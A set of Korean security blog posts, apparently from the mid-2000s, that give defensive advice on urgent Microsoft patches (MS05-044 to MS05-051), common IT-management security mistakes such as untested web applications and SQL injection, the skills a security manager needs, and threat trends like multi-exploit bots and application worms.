* 아래의 이미지는 Security  관련 패러다임이 어떻게 변경 되었는지를 구분짓는 내용입니다. 격리에서 보호로 선회한 가장 큰 이유는 자동화된 공격 및 자동 전파되는 Worm에 의해서 라는 것이 정답입니다.  그 누가 뭐라해도 이 과정을 모두 지켜보고 직접 대응한 입장에서 현재의 패러다임 변화는 명확합니다. ^^;  - 클릭 하시면 큰 그림으로 ^^
Posted by 바다란

2003년 8월 작성.

RPC 관련 대형 취약성 출현시에 위험성을 알리고 대책을 권고하기 위해 간단히 만든 문서.

 

Posted by 바다란

안녕하세요 바다란입니다.

 

최근 MS에서 10월 정기 패치가 발표되었습니다. 그리고 며칠 지나지 않아 취약성을 공격하는 코드들이 출현하고 있습니다. 따라서 긴급껀에 대해서는 빠른 패치가 필요 할 것 같습니다.

 

현재 공격코드가 출현 한 패치는 다음과 같습니다.

05-044 , 05-045 , 05-048  입니다. 이중 CDO 관련된 05-048의 경우 Remote Buffer overflow 입니다.

위의 세 취약성에  대한 PoC ( Proof of concept) 코드가 출현 하였으며 이 의미는 이미 웜 제작 단계에 돌입한 걸로 보입니다.

웜을 만드는 것은 예전과 다르게 아주 손쉽고 자동화 되어 있으며 IRCBot 과 같이 기존에 공격하는 몇 십가지의 취약성에 추가적으로 공격 코드만을 추가 하는 것이므로 매우 쉽습니다. 따라서 복합화된 웜에 대한 위험 레벨이 매우 높습니다.

 

현재 영.미권에서 이번 보안 패치와 관련하여 패치 발표 후 하루도 지나지 않아 위험성 높은 웜으로 발전할 취약성으로 05-051 취약성을 꼽고 있습니다. MSDTC와 관련된 문제로서 MS-SQL을 운용하는 서비스 서버에서는 자동적으로 활성화가 되므로 매우 위험도가 높을 수 있습니다.

 

지난해 부터 지속된 이야기 이지만 최근의 웜은 한 가지 취약성을 공격 하지 않습니다.
대략 20여가지 이상의 최신 취약성을 집중 공격 합니다. 물론 메일 첨부파일 공격은 기본이구요.
이 중에 단 하나의 공격이라도 성공하게 되면 내부에 자신을 복제한 후 IP 대역에 대해서 집중적인 공격을 시행 하게 됩니다. 따라서 한번 침입에 성공하게 되면 내부망에 큰 영향을 미칠 수 있습니다.

 

대응은 PoC 코드가 출현한 패치에 대해서는 긴급 적용이 필요하며 추가적으로 05-051 MS-DTC 관련 Remote 취약성도 긴급으로 처리 하여야 합니다.
이후 서비스 상태에 따라 추가적인 패치가 적용 되어야 할 것 같습니다.

 

공격코드 출현 사이트 입니다.
http://www.frsirt.com/exploits/

 

05-051 관련 소식은 여기입니다.
http://www.zdnet.co.kr/news/internet/virus/0,39031349,39140367,00.htm


**********************************************************************
MS05-044
제목: Windows FTP 클라이언트의 취약점으로 인한 파일 전송 위치 변조 문제점 (905495)

영향을 받는 소프트웨어:
Microsoft Windows XP SP1
Microsoft Windows Server 2003
Microsoft Windows Server 2003 (Itanium 기반 시스템용)

영향을 받는 구성 요소:
Microsoft Windows 2000 SP4의 Internet Explorer 6 SP1

패치 다운로드 ->
http://go.microsoft.com/?linkid=4082650


**********************************************************************
MS05-045
제목: Network Connection Manager의 취약점으로 인한 서비스 거부 문제점 (905414)

영향을 받는 소프트웨어:
Microsoft Windows 2000 SP4
Microsoft Windows XP SP1, SP2
Microsoft Windows Server 2003 RTM, SP1


패치 다운로드 ->
 http://go.microsoft.com/?linkid=4082651

**********************************************************************
MS05-048
제목: Microsoft Collaboration Data Objects의 취약점으로 인한 원격 코드 실행 문제점 (907245)

영향을 받는 소프트웨어:
Microsoft Windows 2000 SP4
Microsoft Windows XP SP1, SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 RTM, SP1
Microsoft Windows Server 2003 (Itanium 기반 시스템) RTM, SP1
Microsoft Windows Server 2003 x64 Edition
Exchange 2000 Server SP3 (2004년 8월에 발표된 Exchange 2000 SP3 이후 업데이트 롤업이 설치된 버전)


패치 다운로드 ->
http://go.microsoft.com/?linkid=4082654

**********************************************************************

MS05-051
제목: MSDTC 및 COM+의 취약점으로 인한 원격 코드 실행 문제점 (902400)

영향을 받는 소프트웨어:
Microsoft Windows 2000 SP4
Microsoft Windows XP SP1, SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 RTM, SP1
Microsoft Windows Server 2003 (Itanium 기반 시스템) RTM, SP1
Microsoft Windows Server 2003 x64 Edition

패치 다운로드 ->
http://go.microsoft.com/?linkid=4082657
**********************************************************************


Let your soul be your pilot!! . p4ssion

 

Posted by 바다란

10가지 어리석은 실수들-2

 - 바다란, zdnet 보안컬럼니스트

 

전편에는 시스템 및 네트워크 부분에서 빈번하게 발생 되는 케이스들을 살펴 보았다. 10여 년의 기간 동안 일선에서 침해사고를 담당하고 보안구성에 대한 업무를 진행하면서 상당수의 침해사고 발생 이후의 확산에 가장 큰 영향을 끼친 부분으로 보고 있다. 이번 컬럼의 내용은 2005년 이후 현재까지 진행중인 대부분의 침해사고에 해당되는 Application에 관련된 부분이다.

네트워크 관리자가 아닌 IT 관리자라 칭한 이유도 범위를 한정하여 발생 되는 부분이 아니며 전체의 관점에서 바라보아야 할 이슈이다.

 

Application에 관련된 보안 부분은 2000년대 이후 장대하고 중요한 흐름을 보이고 있다. 인터넷의 발달과 생활의 밀접화는 주변의 많은 것들을 변화 시켰고 생활에 밀접한 많은 것들을 인터넷 연결이 가능한 많은 부분들로 변하게 하고 있다.

Web 2.0 이라는 용어 자체도 생활에 밀접한 사용자친화형, 생활형을 가진 인터넷상의 삶과 동일하게 볼 수 있다. Web 2.0의 발달이 의미 하는 것은 사용자와 더 친밀하고 생활에 더 밀접한 요소들이 인터넷과 연결 되어져 있음을 의미한다.

 

Twitter 와 미투데이를 이야기 하고 블로그와 SNS의 생활 밀접도는 활동성이 큰 계층에 대해 상당히 높은 비중을 가지고 있다. 사용자간의 밀접도가 높고 연결관계를 가짐으로 인해 예전과는 비교 할 수 없을 만큼의 파급효과를 가지고 있고 위험도 동일하게 존재한다.

Web 2.0에서 발생될 수 있는 위협들에 대해서는 예전에 정리한 자료가(첨부파일) 여전히 유효하며 참고 할 수 있을 것이다.

 

본 컬럼에서 언급하는 Application Web Application으로 한정하여 논의를 하도록 한다. 넓은 범주의 Application이라 하더라도 인터넷 연결이 가능한 대부분의 Application은 동일한 문제들을 지니고 있는 것은 명백한 사실이며 현실이다.

 

< Major Attack trends by p4ssion>

 

전체적인 공격동향의 변화를 정리하고자 2007년에 작성한 이미지이고 현재도 별반 달라진 내용은 없다. 2005년을 기점으로 하여 국내를 기준으로 보면 자동화된 Application Attack이 최초 출현하고 이후에는 폭발적으로 증가한 상태로 볼 수 있다. 전 세계적으로도 Application Attack 관련 하여서는 2005년 이전에는 전문가에 의한 부분적이고 국지적인 침해들이 있었으나 2005년을 기점으로 하여 Web application을 공격하는 도구가 출현함에 따라 파급력이 매우 커지는 결과를 초래 하였고 현재는 인터넷 환경의 가장 큰 위험으로 등극한 상황이다.

 

수많은 개인정보의 유출과 도용 사례, 대규모의 좀비 PC, 서비스에 대한 직접적인 DDos 공격과 같은 모든 주요 사안들이 Application Attack과 연결되어 있다. 본 컬럼에서 필자는 이점에 대해서 분명히 하고자 한다. 2005년을 기점으로 국내 및 세계의 인터넷 위험도는 급격하게 증가 하였으며 보호를 위한 노력이 느리게 진행됨에 따라 지금까지의 위험보다 더 크고 복잡화된 위험들이 이미 다가와 있음을 분명히 한다.

 

 

기존의 소규모 혹은 국지적으로 이루어지는 해킹사고의 경우 침해사고의 범위와 피해 대상이 제한적 이였다. 그러나 현재의 환경은 개인의 PC를 대상으로 하고 있으며 종래에는 서비스까지도 위협하는 단계에 도달해 있다. 공격자들은 공격 범위와 대상에 대해 제한이 없으며 모든 개인 사용자의 PC를 개별적으로 공격할 필요성도 없다. 공격은 웹서비스가 대신해 준다. 공격자는 다만 주된 지점만을 공격하여 악성코드를 유포 하도록 만 하면 된다.

 

주된 지점에 대한 공격은 SNS, 게시판, 덧글, 동영상 등을 이용한 악성코드 전파들도 있으며 더 근본적인 기저에는 취약한 Web Application에 대한 권한 획득이 가장 근본적인 문제이다. Web Application에 대한 직접적인 공격을 통해 DB에 저장된 데이터를 절취해 가고 Web Application의 소스코드를 변조하여 방문하는 모든 사용자에게 악성코드를 유포하도록 한다.

 

Web Application에 대한 자동화된 공격도구의 출현은 보안에 대한 패러다임을 바꾼 것이 아니라 인터넷 산업 자체의 패러다임을 바꾼 중대한 전환점이라 할 수 있다. 공격 도구의 자동화가 끼친 영향은 DB의 사용자 정보 유출 과 정보 유출이 일차적인 목적 이였으나 불특정 다수에 대한 악성코드 유포의 도구로 활용 됨에 따라 큰 전환점이 일어난다.

 

방문 하는 모든 사용자의 PC에 취약성이 존재하면 반드시 감염이 되고 모든 사용자의 정보는 공격자에게로 전송이 되고 조정이 된다. 수백 만대가 넘는 좀비PC의 확보는 상당 부분 유사한 형태로 이루어 졌을 것이다. 유출된 개인정보들은 DB에 저장된 정보 이외에도 개인 사용자 PC에서 전송되는 정보들도 있다. 엄청난 양의 개인정보들은 이미 유출 되었고 활용이 되고 있다. 그 결과 정확도와 신뢰도가 높은 보이스 피싱과 일반적인 피싱 공격들이 연이어서 발생 하는 것뿐이다. 더불어 권한 획득된 개인 PC를 이용하여 DDos 공격을 하고 개인정보를 이용하여 서비스의 혼돈을 초래하며 거래를 통해 이득을 얻어내고 있다.

 

모든 전문가들이 개인PC의 보안을 강화하라고 한다. 그러나 보다 근본적으로는 모든 IT 서비스에 대해 보안성 검증이 먼저 되어야 할 것이다. 전파가 가능한 매개체를 줄이면 피해는 국지적으로 발생 할 뿐이다. 지금은 그 어떤 것도 되어 있지 않고 개인의 책임만을 이야기 한다. 일면 무책임 하기도 하다. 물론 개인PC에 대한 보안성 강화는 당연히 있어야 하는 일이다.

 

 

일반적으로 우리가 악성코드라고 부르는 것은 백신에서 악성코드라고 탐지를 할 때에야 비로소 알게 된다. 악성행위를 하는 프로그램은 백신개발사에 의해 분석되고 등록되기 이전에는 악성코드라고 탐지가 되지 않는다.

 

만약 새로운 유형의 악성코드가 지금껏 발표되지 않은 비공개된 취약성을 이용하여 개인PC를 공격 한다면 사전에 발견 할 수 있을까? 아직 기술의 진보는 여기에 완전하게 이르지 못했다.  그렇다면 웹 서비스를 통해 새로운 유형의 악성코드가 유포 된다면 감염자는 얼마나 될 수 있을까? 방문 하는 사용자의 상당비율이 감염이 될 것임은 불을 보듯 뻔하다. 지금은 얇디 얇은 유리와 같은 상태로 인터넷 서비스와 산업이 유지되고 있는 상황이다.

 

지금의 현실은 상상하기에도 끔찍한 현실이다. 그러나 이 현실 속에서도 생존 해야만 미래가 있다. 그 생존을 위해서는 문제를 공론화 하고 풀어가는 과정이 필요한데 숨기려고만 한다. 풀어가는 과정 조차 없고 문제의 핵심에 대한 논의도 거의 없는 상태이다.

 

 

기본적인 현실에 대한 간략한 설명을 우선 하였고 각 항목별로 어떻게 연결이 되는지 확인을 해보자. 이제 열 가지 실수 중 남은 부분을 살펴 보면 다음과 같다.

 

Failing to test noncritical applications for basic vulnerabilities

 

중요하지 않은 Application이라는 용어에 몇 가지 의미가 있을 수 있으나 이 부분에서는 외부로부터 http 접근이 허용이 된 모든 Application이라고 보아야 바람직하다. 일반적으로 외부로부터 침입에 활용되는 매개체는 2005년 이전의 직접적인 서비스 공격에서 서비스 포트에서 운영이 되는 Web application으로 옮겨져 있다. 지금의 공격도 여기에 집중이 되고 있다. 항상 외부로부터의 관점에서 취약성을 평가해야만 안정성을 보장 할 수 있다. 일반적으로 각 서비스 회사마다 하나에서 수십, 수백여 개의 서비스 URL들을 운영 하고 있을 것이다. 그러나 대부분의 보안상 위험에 대한 관점은 주된 서비스 몇 개에 한정 되어 있다. 위험에 대한 모니터링과 보안에 대한 강화들도 대부분 주요 서비스에만 집중 되어 있는 상황이다. 특히 Application에 대한 보안성 강화는 많은 노력과 시간들이 소요 됨으로 인해 주요 서비스만 시행을 하는 경우만 많다. 내부망에 침입 할 수 있는 주변 Application에 대한 관리가 소홀하고 취약성 제거가 이루어 지지 않는다면 그 동안의 모든 보안강화 조치는 우회를 통해 완전하게 무력화 된다.

 

우회 할 수 있는 여러 통로들이 있고 어차피 동일한 결과를 가져 오는 상황에서 보안이 강화된 사이트들을 직접 공격할 이유는 전혀 없다. 중점 관리의 영역에서 벗어나 있고 외부에 오픈된 상태로 존재하는 web application의 존재는 전체를 위험하게 만들 수 있다. 우회하여 권한을 획득하고 해당 서버에 백도어를 설치한 이후 주변 서버로 제한 없이 공격을 실행 하고 확대하는 것은 보호되고 있는 서비스망 전체를 무너지게 만든다.

 

결론적으로 서비스를 제공하는 모든 Application에 대해서 외부에서의 오픈 현황을 정기적으로 확인하고 오픈된 서비스에 대해서는 반드시 취약성 존재 유무를 확인하고 제거 하여야만 된다. 본질적으로는 허가를 받지 않은 서비스는 외부에 오픈 되어서는 안 되는 것이 기본이나 예외적 상황은 언제든 발생하게 마련이다.

 

벽은 눈 앞에만 쌓여 있고 한 걸음만 옆으로 비껴가면 벽은 없는 것과 마찬가지 이다. 좀 더 나아가 서비스별로 접근제어도 고민 하여야 하고 내부망에서의 위험 인지를 위한 방안들도 고민 하여야 사고가 발생 하더라도 피해의 최소화가 가능하다.

 

보안은 침입을 막는 것도 중요하나 더 중요한 부분은 침입에 대한 피해를 최소화 하고 분석과 재발방지를 위한 대안 제시가 가능한지가 핵심이다. 전문가의 역할이기도 하다.

 

 

 

Not adequately protecting your servers from malware.

 

Malware라는 개념은 악성코드라는 개념으로 볼 수 있고 일반적인 백도어와 키로거등을 총칭한다.현재의 항목에서 논의되는 사항은 바로 위의 항목 부분에서 언급한 내용과 동일하다. 대부분의 서비스 관리자는 바깥으로부터의 침입에만 여력을 기울이는 경향이 매우 크다. 그러나 항상 모든 Application은 취약점이 있다는 자세로 그 다음 단계를 준비하는 것이 반드시 필요하다. 대부분의 공격자들은 침입 이후에는 계정정보를 획득 하거나 백도어를 설치 할 때 알려진 도구를 일반적으로 사용 한다. 이 경우를 탐지 할 수 있는 도구가 필요하며 일반적인 백신 제품의 설치가 필요하다. 서버군이 많을 경우에는 중앙통제가 가능한 형태의 백신 제품을 사용 하여야 관리와 통제가 용이하다. 최소한 알려지지 않은 도구를 사용하더라도 발견 즉시 전체의 서버군에 적용 할 수 있어야 한다. 그래야 피해를 확실히 알고 종합적인 대책이 가능하다.

 

우회 침입 이후의 공격자의 행동을 탐지하고 제약하기 위한 도구들의 운영미비는 항상 존재한다. 또한 공격자들은 침입 이후 (침입자체를 백신제품이 완전히 탐지 하지는 못한다.) 백신 제품이 활성화 되어 있을 경우 백신 제품을 비활성화 시키고 의도한 바를 하고자 한다. 만약 중앙통제 및 관리가 되지 않는 제품이라면 놓칠 수 밖에 없는 부분이다.

 

 

Not knowing where credit card or other critical customer data is stored.

 

서구권역의 경우 중요한 개인정보는 거래 및 카드 관련된 내용, 사회보장번호등이 가장 중요한 내용으로 취급된다. 국내의 경우에는 개인의 신상에 관련된 정보들이 휠씬 더 중요한 의미를 가지고 있다. 카드 도용 사고는 서구권역에서 비일비재하게 발생 되는 이슈이고 사고 발생 이후의 추적을 통해서 문제들을 제거하는 경우가 일반적이다. 국내의 경우는 금융 관련된 거래에는 여러 다양한 제약 조건들이 있어서 공격자가 데이터를 가져간다 하여도 어려움이 존재한다.  장단점이 있지만 국내의 경우는 개인정보가 고유한 Identity를 나타냄으로 인해 여러 유형의 피싱에 이용 될 수 있고 보다 더 복잡한 문제들을 일으키게 된다. 따라서 Data의 보호는 최우선 순위이고 대부분의 IT관리자들이 이점을 잘 알고 있다.

 

Data의 관점은 보호 관점에서 분류가 달라 질 수 있다. 개발소스가 될 수도 있고 고객정보가 될 수도 있다.

 

최 우선순위에 해당하는 보호 대책이 적용 되고 있는 중요 데이터 저장 서버 이외에도 백업된 데이터 및 개발자나 관리자의 PC에 남겨진 데이터들에 대한 관리들도 제대로 되고 있는지 살펴 볼 필요는 있다. 개발자나 관리자 이외에도 고객상담과 관련된 분야에 있어서도 고객 관련된 데이터를 취급함으로써 문제 발생 소지는 높다.

 

공격자는 강화된 수준의 중요 데이터 저장 서버를 직접 공격하기 보다는 우회하여 주변의 백업 혹은 개발자, 관리자, 고객상담 관련 부분에 대한 우회 공격을 통해 손쉽게 정보를 빼내어 갈 수 있다.

 

정책적이고 기술적인 측면에서 중요 Data에 대한 접근과 관리 및 보관에 대해서는 엄격한 적용이 필요하고 보호대책도 준수 되어야 함을 알 수 있다.

 

 

 

Failing to find SQL coding errors. ( or Application vulnerability)

 

 

Application의 취약성을 찾는 것은 항상 어렵다. 특히 C/S Application이 아닌 변화와 갱신이 많은 Web Application에 대해 보안성을 항상 최상으로 유지하는 것은 상당히 어려운 수준의 업무임은 틀림 없다.

 

SQL Injection 공격은 현재 직접적인 Web server 침입과 Data의 절취에 직접 사용이 되고 있는 공격 기법이고 자동화된 도구가 대량으로 출현한 상태라 Web Application의 안정성은 높은 수준으로 위협을 받고 있다. 문제 해결을 위해서는 장비 도입을 통해 임시적으로 막는 방법들이 있고 또 한가지는 근본적인 소스코드의 문제점을 수정하는 방법이 있다. 웹 보안 장비의 도입을 통해 막는 방법은 우회할 수 있는 여러 기법들과 새로운 공격 기법의 출현에 따라 무력화 되면 새로운 공격 기법이나 우회 기법이 나올 때 마다 업데이트를 진행 해 주어야만 하는 점이 있다.

 

특징을 가진 웹 사이트의 경우에는 각 사이트마다 특징에 맞는 구성을 해주어야 하는 점도 있어서 공격 유형의 변화에 빠른 대응을 하기란 어려운 점들이 있다. 근본적인 문제 해결을 위해서는  전문인력을 통해 보안성을 점검하거나 스캐너, 소스코드 리뷰 등을 통해서 소스코드에 존재하는 문제점을 찾아 내고 수정 할 수 있도록 가이드 하여야 한다.

 

보안장비의 경우에는 변화되는 공격에 무력하다는 점과 특징이 있는 경우에는 Customizing이 대량으로 필요하다는 점에서 어려움이 존재한다. 그러나 당장의 소스코드 개선 여력이 없는 곳에서는 알려진 위험을 막기 위해서라도 도입 하는 것은 바람직하다. 근본적인 개선은 아니며 향후 문제 발생 소지가 계속 존재한다는 점은 절대 잊지 말아야 한다.

 

전문인력을 통해 진단을 하고 소스코드를 리뷰 하는 행위의 문제점은 웹 서비스 개발보다도 리소스 비용 및 시간 소요가 더 오래 걸리는 경우가 많다는 점이 문제다. 치명적인 문제점이라 할 수 있다. 또한 템플릿 을 기반으로 하여 Secure programming을 진행하는 경우 웹 개발자에게 획일화된 프로그래밍을 하도록 제약 함으로써 창의성을 해치는 결과를 가져 오기도 한다.

 

두 방안 모두 장단점이 있으나 여력이 있는 서비스 업체와 그렇지 않은 업체 사이에 선택은 다를 수 밖에 없을 것이다. 현재의 인터넷 환경은 가난하고 여력이 없는 서비스에 대해서는 무지막지할 정도로 가혹한 환경이다.  이 부분에 대해서는 근 시일 내에 컬럼으로 효율적인 대응 방안을 정리 할 수 있도록 하겠다.

 

 

Not following the Payment Card Industry Data Security standards.

 

위의 항목은 국내의 현실과는 약간 다른 항목이다. 국내에서 통용되는 부분으로 논의하자면 좁은 범주의 정보보호관리체계인증(ISMS), 정보보호안전진단, ISO 27001 (이전의 BS7799)등에 존재하는 Data 보호 규정을 준수 하여 Data를 보호해야 한다는 것을 의미한다. Data의 보호를 위한 규약들은 기본적인 규칙의 준수를 의미한다. 기밀성이 필요한 데이터에 대한 암호화, 외부로부터의 접근제한, 접근자에 대한 통제, 기본적인 서비스 보안구성, 암호화된 데이터의 전송 등은 필수적으로 고려해야 할 대상이다. 상세한 설명은 곳에서 찾을 수 있다.

 

 

이상과 같이 전편에 이어 이번 편에 이르기까지 10가지의 실수들에 대한 언급을 통해 자주 발생 되는 침해사고에 대한 내용들과 연관된 부분들을 살펴 보았다. 물론 개인적인 경험들이 들어간 내용이라 정확한 방향이라고 언급하기에는 어려운 부분이 있다. 여러 해 동안을 일선에서 살펴보고 대응을 하는 과정에서 일관되게 발견 되는 문제점으로서 언급을 하였다는 정도로 인식을 해주시면 바람직할 것이다.

 

현재의 인터넷은 침해사고에 대한 언급을 하기 이전에 상당히 위험한 상황에 처해 있으며 앞으로 상당 수준의 노력을 기울여야만이 일정 수준의 성과를 보장 할 수 있는 상태이다. 위험성은 은폐한다고 해서 사라지지 않는다. 은폐든 무지든 마찬가지의 결과다. 더 큰 결과로 산업을 위협하게 될 것이다. 이제는 직접적인 위협이 됨을 이미 여러 번 목격을 하였지만 아직 큰 방향성도 없다.

 

사막의 여행자는 눈 앞의 끝없는 사막이 아니라 밤하늘의 별을 볼 수 있어야만 생존 할 수 있다고 한다.  지금 우리는 어디쯤인지도 모르는 것은 아닐까?

 

 

인터넷과 IT의 활성화를 시작한 김대중 전 대통령의 서거를 진심으로 애도합니다.

유난히 큰 분들이 많이 가십니다. 어쩌면 인간의 탐욕에 대한 재앙이 아닐까 생각 되어 씁쓸합니다.

Posted by 바다란

http://news.naver.com/news/read.php?mode=LSS2D&office_id=092&article_id=0000007823&section_id=105&section_id2=283&menu_id=105

 

다 알고 있는 사실들이지만 공개적으로 언급을 해보자.

 

대부분의 관리자는 어떻게 하면 내부 네트워크를 안전하게 지키고 보호 할 수 있는지에 대해서 알고 있다. 그리고 내부 네트워크를 지키기 위해서라면 내부의 구성에 대해서 철저하게 알고 있어서 문제점 및 취약 부분에 대해서 분명한 이해를 하고 있어야 된다.

그러나 기업의 네트워크망은 발전을 하는한 계속 확장되기 마련이고 현재와 같은 전자금융 및 전자거래의 증가 , 인터넷 비즈니스의 확장에 따라 확장은 필연적이다. 작은 회사의 스위치 몇 대와 한정된 시스템 자원의 운영시에는 관리자의 관리포인트는 작을 수 밖에 없다. 또한 중점 관리 대상도 한정이 될 수 밖에 없다. 이 과정에도 난점이 존재한다.

 

보안 관리자의 기본 요건을 완비하기 위해서는 최소한 IT보안 부분에 한정해서 보았을때 다음과 같은 필요성이 요구된다. 기본전재로 서비스의 구성은 다음과 같이 이루어 진다. 네트워크 인프라 + 시스템 자원 + Application  이외에도 인력에 대한 통제 및 내부 기밀 유출 방지등에 대한 다양한 시각이 있을 수 있으나 여기에서는 IT보안 부분에만 한정하여 보기로 하였으므로 위의 세가지 부분에 대해서 언급을 해보겠다.

 

 

1. 네트워크 보안 지식 - 기본적인 네트워크 단위의 구성과 보안 구성을 위한 안을 고민 할 수 있어야 하고 보다 더 안전하고 내부를 보호할 수 있는 단위를 고민할 지식 및 역량이 있어야 한다.

 

2. 시스템 보안 지식 -  네트워크 장비를 제외한 대부분의 장비가 운영체제가 설치된 시스템들이다. 이 시스템의 운영체제는 독특한 경우를 제외하고는 여러 종류의 운영체제가 설치가 되며 모든 부분에 통달 하지는 않더라도 근본 구성 요소 및 전체적인 지식을 포괄적으로 알고 있어야 하며 몇몇 운영체제에 대해서는 심도 있는 지식이 필요하다. 또한 이러한 지식을 바탕으로 기본 보안 룰 및 보안 정책을 수립 할 수 있어야 한다.

 

3. Application  - 운영체제 위에 올라가는 Application도 다양한 종류가 존재한다. Database solution , Web Solution 등등 이루 말할 수 없는 수많은 종류의 Application이 존재한다. 또한 직접 개발하여 운영중인 웹페이지나 솔루션들도 회사나 서비스의 규모에 따라 매우 많은 종류가 존재하며 동일한 플랫폼을 운영하지 않는 경우에는 다양한 프로그래밍 및 기법이 적용된 수많은 Application이 존재하게 된다. 근래에 더욱 중요하게 여겨지는 부분인데 Application에 대한 공격이 지난해 초 부터 급증을 하는 것이 현실이다. 각 개별 Application들의 문제를 이용한 웜이나 바이러스 그리고 정보를 유출하기 위한 악성코드등이 다수 설치가 되며 내부 기밀정보가 저장된 DB의 권한을 손쉽게 획득하는 등 다수의 위험성이 증가하고 있으며 향후에도 매우 증가할 것으로 예상이 된다. 따라서 보안 관리자에게는 그동안의 네트워크 통제 및 시스템에 대한 지식외에도 다방면의 Application에 대한 지식 및 프로그래밍의 허와 실을 지적할 수 있는 능력이 시급하게 필요한 상황이다.

 

위의 세 가지 외에도 필요한 부분들은 다수가 있을 수 있으나 가장 시급하게 필요한 부분은 위의 세 부분이다. 특히 네트워크 및 시스템 지식을 지닌 보안 관리자들은 다수 있으나 Application에 대한 지식이 없거나 부족한 관리자들이 많아 현재도 상당한 위험에 노출이 되어 있는 상황이며 보안 솔루션으로 해결하기에는 문제의 발생 이후 대응 하는 기간이 짧아 보안 솔루션의 시기 선점이나 연구는 조금씩 대응이 늦어지고 있고 그 간극은 더욱 차별화 될 것으로 보인다.

연구 역량을 지닌 몇몇 거대 기업에 의해 선점될 이슈로 인해 작은 보안 회사들의 생존은 힘들어 질 것이고 독점에 의한 고가의 제품들로 인해 역량있는 보안전문가 집단을 보유하지 못한 회사들은 많은 비용 부담을 책임질 수 밖에 없을 것으로 판단된다.

 

보안은 결과가 아닌 과정이다.

비지니스의 연속성을 보장하는 필수적인 과정이며 IT가 발달 할 수록 인터넷 문화가 발전 할 수록 더욱 더 필요한 부분이 될 수 밖에 없을 것이다.

 

그렇다면 현재 상태에서의 문제 해결은 무엇이 될까?

관리자가 감당하기에는  벅찬 시스템 및 네트워크의 자원 그리고 공격자들의 빠른 전환과 자동화된 공격 , Application 전체적인 레벨 유지 및 보안상의 문제들 , 대규모 악성코드 및 커널레벨까지 컨트롤 하는 시스템 백도어들의 출현 등등

 

위의 문제들은 규모가 있는 회사 일 수록 더욱 심각하게 다가오는 문제들이다.

기사에서 언급된 방안도 고민할 수 있는 방안이며 현재로서는 유일한 대안이라고도 할 수가 있을 것 같다. 공격자의 입장에서 내부에 문제는 없는지 여러 점검포인트들에 대해서 핵심을 짚고 각 해당 점검 포인트 별로 순차적인 문제 해결을 위한 점검을 실제 공격자의 입장에서 진행을 한다면 드러나는 문제점들에 대해 손쉽게 공격을 당하거나 노출된 취약점들을 지속해서 줄일 수 있을 것이다.

 

IT보안이라는 것이 더욱 중요한 시기이고 문제를 해결 하기 위한 노력도 더욱 증감 되어야 한다. 그러나 현재 상태는 고가의 장비를 도입한다고 하여 점검포인트 전체를 커버 할 수는 없으며 유일한 방안은 점검포인트를 분명히 체크 할 수 있고 명확한 방침을 가지고 운영을 하여야 하며 뛰어난 전문가 집단을 외부에서든 내부에서든 수시로 활용이 가능하여야 한다. 여력이 되는 회사라면 내부에 운영하는 것이 기밀 및 전체적인 보안 수준의 향상에 큰 기여를 할 것이고 그렇지 않은 기업이라면 외부에서 주기적인 점검을 통해 체크를 하여야 한다.

점검포인트 측면에서 아무래도 외부에서 접근을 하는 경우에는 놓치는 곳들이 있을 수 밖에 없으므로 문제는 계속 될 것이지만 드러난 위협을 줄일 수는 있을 것이다.

 

정리하면 다음과 같다.

 

* 점검포인트를 명확하게 규정하고 주된 위협지점을 찾을 수 있는 역량 있는 자의 충원

* 역량 있는 자의 충원 이후에 시스템 및 Application 단위의 문제점을 지적할 수 있는 전문가 집단의 충원 혹은 외부 동원을 통한 상시진단.

* 문제의 수정 및 신속한 보안 대책 수립 및 이행

 

원론적인 이야기 이지만 IT보안에 있어서는 근본적인 대책이며 현재 다수 발생하고 있는 Application 관련 보안 사고 및 문제들을 최소화 할 수 있는 기본 방안이라 할 수 있다. 변화하는 위협에 대처하기 위해서는 전문가 집단의 확보는 필수라고 할 수 있다. 위협은 너무나도 빨리 변화고 수시로 큰 위협으로 돌변함으로 준비하지 않는 기업이나 산업에는 재앙으로 다가 올 수도 있을 것이다.

 

감사합니다.  - p4ssionable security explorer  바다란

 

 

Posted by 바다란

 

 

 

2005년 현재의 취약성 및 위협 동향 과 향후의 위협 과 대응

 

 

최근 동향을 보면 다음과 같이 요약이 가능합니다.

 

* 클라이언트 단위의 위험 증가 ( 개인 PC 에 대한 중점적인 공격 )

해외에서는 피싱등을 이용한 공격이 증가하고 있고 국내에는 직접적인 클라이언트 PC 공격 및 취약성을 이용한 악성코드 설치가 주된 유형입니다.

 

* 일반 Application에 대한 공격 증가
( 버그트랙이나 기타 메일링을 보아도 운영체제 등에 대한 취약성 보다는 운영체제 기반하에서 영리 목적이나 운영을 목적으로 코딩된 솔루션에 대한 취약성이 집중되고 있습니다.)

http://www.securitymap.net/sdm/docs/attack/Application-Attack-Analysis-PHP.pdf

 

 

* 보다 더 집중화된 Bot의 공격 

( 일전에 Bot 관련된 언급을 하면서 Monster Bot 이라는 용어를 언급한 적이 있습니다. 취약성이 나올때 마다 공격 기능이 하나씩 더 추가가 되어 하나의 Bot이 공격하는 공격의 가지수가 지속적으로 늘어나는 유형이죠. 또한 운영체제의 구분 없이 Application 에 대한 공격 유형도 첨가 되는 형태라 가히 Monster bot으로의 지속적인 진화가 예상 됩니다. )

 

* Application Worm의 일반화 가능성 매우 증대

( 특정 국가 , 특정 지역 , 특정 회사에 기반하여 사용되고 있는 Application 자체의 취약성을 통해 전파되고 통신망을 무력화 하는 공격이 매우 증가할 것으로 판단 됩니다. 무선 관련이나 블루투스 관련된 웜의 전파도 동일 유형이라고 보시면 됩니다.)

http://www.securitymap.net/sdm/docs/virus/Zeroday-worm.pdf

 

 

 

위와 같이 요약이 됩니다.

 

또한 향후 발생할 위협을 정리 해보면 다음과 같이 정리가 됩니다.

 

향후 지속될 위협

 

* 오래전 부터 언급한 기반시설의 IP 전환 및 온라인 노출이 많아 짐으로 인한 위협의 현실화 ( 기반시설의 위협에 관한 문서를 참고 하시면 됩니다.)

너무 빨리 문제제기를 한 면이 있지만 향후 지속적으로  일반화 될 것으로 예상 됩니다.

http://www.securitymap.net/sdm/docs/attack/internetcrisis_conspiracy%20.pdf

http://www.securitymap.net/sdm/docs/general/Critical_Alert_for_Cyber_Terror.pdf

 

* 무선 및 WiBro , DMB의 활성화를 통한 웜 전파

( IP 기반의 모든 머신에 해당이 될 것이며 이 경우에는 프로토콜 간의 Gateway의 보안설정 이나 허용 조건에 따라 보다 많은 편리성을 제공할 경우 광범위하게 전파가 될 것으로 판단됩니다. )

 

